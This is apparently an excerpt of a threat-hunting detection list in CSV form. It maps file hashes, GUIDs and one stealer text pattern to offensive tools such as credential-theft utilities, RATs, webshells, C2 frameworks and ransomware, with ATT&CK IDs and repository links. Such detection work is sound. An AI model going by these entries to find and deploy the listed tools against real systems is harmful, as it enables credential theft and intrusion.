"*c4d31433-5017-4b5e-956b-8a540520986c*",".{0,1000}c4d31433\-5017\-4b5e\-956b\-8a540520986c.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#GUIDproject","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","37012"
"*c4d95bff1eced83e423deb8555d636b02c290adba785a349bc776711bbc2841e*",".{0,1000}c4d95bff1eced83e423deb8555d636b02c290adba785a349bc776711bbc2841e.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#filehash","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","37013"
"*c4da631e510a57e39a6e9021a1d3f1d563f59f351bdd84b46e48a0e27e6b9cbb*",".{0,1000}c4da631e510a57e39a6e9021a1d3f1d563f59f351bdd84b46e48a0e27e6b9cbb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","37014"
"*c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98*",".{0,1000}c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","37015"
"*c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98*",".{0,1000}c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","37016"
"*c4e091bf77e1eda6f74951893238a2d68b61d530ad71ae993f21576ef80b6903*",".{0,1000}c4e091bf77e1eda6f74951893238a2d68b61d530ad71ae993f21576ef80b6903.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37018"
"*c4e2c901b28da1a3c2d5b4714a9f11c9e4b9f417c1be73290a14a6d622607f78*",".{0,1000}c4e2c901b28da1a3c2d5b4714a9f11c9e4b9f417c1be73290a14a6d622607f78.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37019"
"*c4e3e811811d927b64d5f66596be79f4110c7bcaa77621fbb73b7c7d8f69189c*",".{0,1000}c4e3e811811d927b64d5f66596be79f4110c7bcaa77621fbb73b7c7d8f69189c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37020"
"*c4e9806596b8e6123a595395b0efe604176dfd2e767418fe4adf69c70de557b5*",".{0,1000}c4e9806596b8e6123a595395b0efe604176dfd2e767418fe4adf69c70de557b5.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#filehash","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","37021"
"*c4eac73762f7e920030de4e0de677fd6c87372ec59fffcb636996d6ad86358d9*",".{0,1000}c4eac73762f7e920030de4e0de677fd6c87372ec59fffcb636996d6ad86358d9.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37023"
"*c4ef00f9cf5b19babc7d9d7de5d4724c3b077be8dcd449b17dde8fe5297f5a98*",".{0,1000}c4ef00f9cf5b19babc7d9d7de5d4724c3b077be8dcd449b17dde8fe5297f5a98.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","37025"
"*c4f026c01e451e1afa61ab8233fd15a3c0b4da615eae5d893db82b84bbe49e40*",".{0,1000}c4f026c01e451e1afa61ab8233fd15a3c0b4da615eae5d893db82b84bbe49e40.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT  Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","TA2541 - APT-C-36","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","#filehash","N/A","10","10","92","39","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z","37026"
"*c4f85b6571f2fe493811418ea62fa29c393799ea3e3cd2ba907b70229a57935d*",".{0,1000}c4f85b6571f2fe493811418ea62fa29c393799ea3e3cd2ba907b70229a57935d.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37027"
"*c4fa40d25a8a4fc502e9cce4fa6d7ef7847141bda5f2fb7b90bd9f4b43ee5d13*",".{0,1000}c4fa40d25a8a4fc502e9cce4fa6d7ef7847141bda5f2fb7b90bd9f4b43ee5d13.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","37028"
"*c4fa40d25a8a4fc502e9cce4fa6d7ef7847141bda5f2fb7b90bd9f4b43ee5d13*",".{0,1000}c4fa40d25a8a4fc502e9cce4fa6d7ef7847141bda5f2fb7b90bd9f4b43ee5d13.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","37029"
"*C4RD N4M3: *| NUMB3R:*",".{0,1000}C4RD\sN4M3\:\s.{0,1000}\|\sNUMB3R\:.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","37031"
"*c50948b611e3e9902eab10fff0c03918d3420fb4126a9ca8a8882f03613775e5*",".{0,1000}c50948b611e3e9902eab10fff0c03918d3420fb4126a9ca8a8882f03613775e5.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37033"
"*c51005736c67304bf96c0e5421ce44f700578b87dbc912a820fd38dfa146fe41*",".{0,1000}c51005736c67304bf96c0e5421ce44f700578b87dbc912a820fd38dfa146fe41.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#filehash","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","37036"
"*c51687517b8113afd3b26a2db8329d76ba8232069480c6fd49e255dd4ebe30c6*",".{0,1000}c51687517b8113afd3b26a2db8329d76ba8232069480c6fd49e255dd4ebe30c6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37037"
"*c518104a683209a63029169a1a69e839cf0a7baf26f29bf1fcc96e6c4f776245*",".{0,1000}c518104a683209a63029169a1a69e839cf0a7baf26f29bf1fcc96e6c4f776245.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#filehash","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","37038"
"*c5249fdd933f64a03adee3f4ddd76878ee33c70e08f34299cc979bd7f67e70a1*",".{0,1000}c5249fdd933f64a03adee3f4ddd76878ee33c70e08f34299cc979bd7f67e70a1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37041"
"*c526a60222848f43e3d11b9fceae6cab1e9e414b490f8247ee95bff8a864b61f*",".{0,1000}c526a60222848f43e3d11b9fceae6cab1e9e414b490f8247ee95bff8a864b61f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37043"
"*C526B877-6AFF-413C-BC03-1837FB63BC22*",".{0,1000}C526B877\-6AFF\-413C\-BC03\-1837FB63BC22.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","#GUIDproject","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","37044"
"*c52ebc7882d730dcd1d32551e8ed3eca5997f56079efb92c591e62292d3c0c09*",".{0,1000}c52ebc7882d730dcd1d32551e8ed3eca5997f56079efb92c591e62292d3c0c09.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37047"
"*c5322b9356674659db7025d0571de7020532e4ddc25ecfe69a7fddae00e95476*",".{0,1000}c5322b9356674659db7025d0571de7020532e4ddc25ecfe69a7fddae00e95476.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37048"
"*c53a7f81553bb2d0b575c48c194a100c9d10dd08f6c7538c92a9db2080b47792*",".{0,1000}c53a7f81553bb2d0b575c48c194a100c9d10dd08f6c7538c92a9db2080b47792.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37050"
"*c53bc13170b9ff26b0cca93715e947318e06cafe0d98cf825eabffe3c7f763cb*",".{0,1000}c53bc13170b9ff26b0cca93715e947318e06cafe0d98cf825eabffe3c7f763cb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37052"
"*c545fe6ed777aebd67e71c4f31eeaf05ca2a384d9837d752f238b484fd4514a9*",".{0,1000}c545fe6ed777aebd67e71c4f31eeaf05ca2a384d9837d752f238b484fd4514a9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37053"
"*c546b48376d7d1ba5819e19231547d682cf9d137001de827b209a3c06cd184c0*",".{0,1000}c546b48376d7d1ba5819e19231547d682cf9d137001de827b209a3c06cd184c0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37054"
"*c5486044f99bdf53ddbd6d45a22c38183f094a8c0db958c189c2b601d2b2b13e*",".{0,1000}c5486044f99bdf53ddbd6d45a22c38183f094a8c0db958c189c2b601d2b2b13e.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","37056"
"*c5512b0f7e41dfd3f8a5c0dff6910509a6cb3e4653a87b3d4daa402d7b40bb98*",".{0,1000}c5512b0f7e41dfd3f8a5c0dff6910509a6cb3e4653a87b3d4daa402d7b40bb98.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37057"
"*c55abfcbc2387e66916f27209a8c7ec2066eb3f5787ef72a7aa8945646cc3eba*",".{0,1000}c55abfcbc2387e66916f27209a8c7ec2066eb3f5787ef72a7aa8945646cc3eba.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","37058"
"*c562f6223396e63dae95ab394c4b7a4ff3836d246a97266d5bb601f47bfdd2a1*",".{0,1000}c562f6223396e63dae95ab394c4b7a4ff3836d246a97266d5bb601f47bfdd2a1.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37059"
"*c56e66d683919054d0ae34f15f5d08624ad6a8c211ba8768fb52d09190b0a74d*",".{0,1000}c56e66d683919054d0ae34f15f5d08624ad6a8c211ba8768fb52d09190b0a74d.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","37061"
"*c571768a81029101024089c004311655cdfba690a01954835808439b691a47c0*",".{0,1000}c571768a81029101024089c004311655cdfba690a01954835808439b691a47c0.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37062"
"*c5733dd416b4bfaed6f24b3a8755fd49f441c5675749a087e018ec7de628be90*",".{0,1000}c5733dd416b4bfaed6f24b3a8755fd49f441c5675749a087e018ec7de628be90.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37064"
"*c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30*",".{0,1000}c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37067"
"*c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30*",".{0,1000}c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37068"
"*c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30*",".{0,1000}c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37069"
"*c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30*",".{0,1000}c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37070"
"*c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30*",".{0,1000}c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37071"
"*c58ae1aeef1d895bfc5083722ab5e5b9e097abf48426d8c1210017f94a6aa8e1*",".{0,1000}c58ae1aeef1d895bfc5083722ab5e5b9e097abf48426d8c1210017f94a6aa8e1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37074"
"*c58ca5354bbf124feccf0f2347ad5d9a4f2d6a6593b1e4ce71c380e12e9bf1de*",".{0,1000}c58ca5354bbf124feccf0f2347ad5d9a4f2d6a6593b1e4ce71c380e12e9bf1de.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37075"
"*c591ed58f48171fa285464339a17acd1c267c0299df9f0b4e53eed9a8acb8f9f*",".{0,1000}c591ed58f48171fa285464339a17acd1c267c0299df9f0b4e53eed9a8acb8f9f.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","#filehash","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","37077"
"*c59442ebadea15353f763e5e4ad6267d1c9acd9f40e3af728185b524478e4d66*",".{0,1000}c59442ebadea15353f763e5e4ad6267d1c9acd9f40e3af728185b524478e4d66.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","37078"
"*c59750dfe30a62ae41e8ba1fe138ce5bc575041afa2d7b87645e2f5d54526a9d*",".{0,1000}c59750dfe30a62ae41e8ba1fe138ce5bc575041afa2d7b87645e2f5d54526a9d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37079"
"*c59bb1299b1edf20518ae2b0775eb56eae62a77e46dc3ae45560f47e0af39299*",".{0,1000}c59bb1299b1edf20518ae2b0775eb56eae62a77e46dc3ae45560f47e0af39299.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37080"
"*c59d5571282b31757c89952001ed062772d696e1df2f036b1d4328f9eb99806a*",".{0,1000}c59d5571282b31757c89952001ed062772d696e1df2f036b1d4328f9eb99806a.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","37081"
"*c5a1680cc5dd2fe6fe2fd465429489a6c67ee5f4e7463344fe0dc92f8d672a9b*",".{0,1000}c5a1680cc5dd2fe6fe2fd465429489a6c67ee5f4e7463344fe0dc92f8d672a9b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37083"
"*c5a8a142728c93974f8bad555cf988db83be078e17dc1ac591fa3ff1303e852a*",".{0,1000}c5a8a142728c93974f8bad555cf988db83be078e17dc1ac591fa3ff1303e852a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37084"
"*c5a8b48bbe0bf68409a54d401ebac706e3f3880822310717d2d8e7db5cec436b*",".{0,1000}c5a8b48bbe0bf68409a54d401ebac706e3f3880822310717d2d8e7db5cec436b.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","37085"
